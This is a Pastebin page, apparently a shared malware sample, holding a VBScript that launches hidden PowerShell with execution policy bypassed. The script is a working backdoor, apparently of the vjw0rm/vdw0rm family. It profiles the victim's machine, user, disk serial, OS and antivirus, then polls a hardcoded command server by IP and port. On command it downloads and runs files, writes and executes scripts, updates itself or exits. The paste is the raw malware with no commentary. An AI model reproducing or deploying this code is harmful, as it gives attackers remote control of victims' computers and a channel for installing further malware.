SHARE
TWEET

Untitled

Racco42 Mar 20th, 2019 82 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. set O = CreateObject("Wscript.Shell")
  2.  
  3. O.Run "powershell -ExecutionPolicy Bypass -Command " & chrw(34) & "$spl = '\';
  4.  
  5. $vn = 'Guest';
  6. function info {
  7.   try {
  8.     $mch = [environment]::Machinename;$usr = [environment]::username;
  9.     $HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;
  10.     $HWD = $HWD[0];
  11.     $wi = (Get-WmiObject Win32_OperatingSystem).Caption;
  12.     $wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');
  13.     $av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;
  14.     $e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';
  15.     if (test-path $e) {
  16.       $nt = 'YES'
  17.     } else {
  18.       $nt= 'NO'
  19.     };
  20.     if (test-path 'HKCU:\vdw0rm') {
  21.       $usb = 'TRUE'
  22.     } else {
  23.       $usb = 'FALSE'
  24.     };
  25.     $u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;
  26.     return $u
  27.   } catch {
  28.     Start-Sleep -s 3
  29.   }
  30. };
  31.  
  32. function post ($cmdv, $v) {
  33.   try {
  34.     $enc = [system.Text.Encoding]::UTF8;
  35.     $Req = [System.Net.HttpWebRequest]::Create('http://103.1.184.108:2213/' + $cmdv);
  36.     $Req.Method = 'POST';
  37.     $req.UserAgent = info;
  38.     [System.IO.Stream]$stm;
  39.     $stm = $Req.GetRequestStream();
  40.     $Y = $enc.GetBytes([byte][char]$V);
  41.     $Stm.Write($Y, 0, $Y.Length);
  42.     $stm.close();
  43.     $resp = $req.GetResponse().GetResponseStream();
  44.     $sr = New-Object System.IO.StreamReader($resp);
  45.     $v=$sr.ReadToEnd();
  46.     $sr.close();
  47.     return [string]$v
  48.   } catch {
  49.     Start-Sleep -s 3
  50.   }
  51. };
  52.  
  53. $infinite =$true;
  54. while($infinite) {
  55.   $cmd = @(post('Vre','').ToString());
  56.   $T,$T1,$T2 = $cmd[1] -csplit 'ameer',3;
  57.   if ($T -eq 'exc') {
  58.     try {(New-Object System.Net.WebClient).DownloadFile($T1, $env:temp + '\' + $T2);
  59.       [Diagnostics.Process]::Start($env:temp + '\' + $T2)
  60.     } catch {
  61.       Start-Sleep -s 3
  62.     }
  63.   };
  64.   if ($T -eq 'Sc') {
  65.     Try {
  66.       [IO.File]::AppendAllText($env:temp + '\' + $T2,$T1);
  67.       [Diagnostics.Process]::Start($env:temp + '\' + $T2)
  68.     } Catch {
  69.       Start-Sleep -s 3
  70.     }
  71.   };
  72.   if ($T -eq 'Rn') {
  73.     try {
  74.       $Gb = [system.Text.Encoding]::Default;[IO.File]::WriteAllBytes($env:temp + '\' + $T2,$Gb.GetBytes($T1));
  75.       [Diagnostics.Process]::Start($env:temp + '\' + $T2)
  76.     } catch {
  77.       Start-Sleep -s 3
  78.     }
  79.   };
  80.   if ($T -eq 'Up') {
  81.     try {
  82.       $Gb = [system.Text.Encoding]::Default;[IO.File]::WriteAllBytes($env:temp + '\' + $T2,$Gb.GetBytes($T1));
  83.       [Diagnostics.Process]::Start($env:temp + '\' + $T2);
  84.       exit
  85.     } catch {
  86.       Start-Sleep -s 3
  87.     }
  88.   };
  89.   if ($T -eq 'Cl') {
  90.     exit
  91.   };
  92.   $T = $null;
  93.   $T1= $null;
  94.   $T2 = $null;
  95.   Start-Sleep -s 7
  96. }"
  97.  
  98. & chrw(34),0,false
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top